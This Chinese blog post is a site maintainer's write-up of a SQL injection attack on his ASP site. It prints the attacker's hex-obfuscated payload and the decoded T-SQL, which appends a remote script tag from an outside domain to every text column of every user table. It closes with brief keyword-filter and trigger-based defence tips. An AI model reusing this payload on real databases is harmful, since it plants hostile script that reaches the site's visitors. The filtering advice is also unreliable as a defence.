ASP 二进制SQL注入程序思索

zoukankan html css js c++ java

ASP 二进制SQL注入程序思索

最近维护一个ASP网站，发现其被SQL注入，和往常的SQL注入不同的是他居然吧SQL语句编译成了二进制，然后再执行SQL写一个存储过程，然后再执行，最后删除存储过程，让你无际可循。说实话，我很佩服现在的黑客，如果可以我也想学学，这是怎么写出来的。。呵呵下面是他执行的SQL的源码

dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s)

经过编译其实就是这个样子

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<mce:script src="http://cn.jxmmtv.com/cn.js" mce_src="http://cn.jxmmtv.com/cn.js"></mce:script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

是不是看得你脑壳大。。。没办法其实我的脑壳也很大这些代码的出处为 http://blog.csdn.net/tkjune/archive/2009/01/03/3687728.aspx

加上以前的那些东东，其实也让我恍然一下想起了很多。原来原理都是一样啊，通过那些不注意对自己的ID那些进行加密的网站的URL 例如 Class.asp?id=1 这些进行加后缀然后SQL注入攻击。那我们如何防御呢。

思想很简单，其实就是过滤这些增删改差字段。在你的数据访问类里面进行过滤。针对一些汇编语言的SQL注入，我建议大家还是对输入的SQL进行二进制的转码然后再对比。然后过滤。如果考虑安全性考虑，我觉得还是应该在数据库里面写触发器通过触发器进行SQL语句的过滤

查看全文

相关阅读:
hadoop集群的搭建
 EclipseAndroid打包签名发布安装失败闪退运行不了
 [目录]C#学习笔记
 [目录]搭建一个简单的WebGIS应用程序
 实现DataTables搜索框查询结果高亮显示
 解决将Excel表导入到SQL Server数据库时出现Text was truncated or one or more characters had no match in the target code错误
 将展示内容（div、iframe）放在Expand控件中
 [C#学习笔记1]用csc.exe和记事本写一个C#应用程序
 选中FeatureLayer元素并高亮显示
 在地图中调用显示FeatureLayer并进行render、popupTemplate、添加图例等相关内容的设置

原文地址：https://www.cnblogs.com/dingdingmao/p/3146572.html